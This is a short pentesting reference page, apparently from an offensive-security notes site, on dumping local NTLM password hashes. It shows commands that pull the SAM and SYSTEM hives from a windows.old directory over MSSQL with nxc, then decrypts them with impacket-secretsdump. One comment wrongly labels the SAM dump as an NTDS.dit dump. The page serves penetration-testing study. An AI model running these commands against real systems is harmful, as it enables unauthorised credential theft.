Local SAM Dump

If we have access to a windows.old directory or an old Windows backup, we can extract the SYSTEM and SAM registry hives to perform offline credential dumping:

The SAM hive contains encrypted NTLM password hashes for local user accounts
The SYSTEM hive holds the boot key required to decrypt them.

# Download files with nxc
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SYSTEM" ./SYSTEM

$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SAM" ./SAM

# Dump NTDS.dit
impacket-secretsdump -system SYSTEM -sam SAM LOCAL

This technique is conceptually the same as using mimikatz lsadump::sam, which performs the same operation but directly on a live system.

PreviousKerberoasting NextNTLMv2

Last updated 5 months ago

Was this helpful?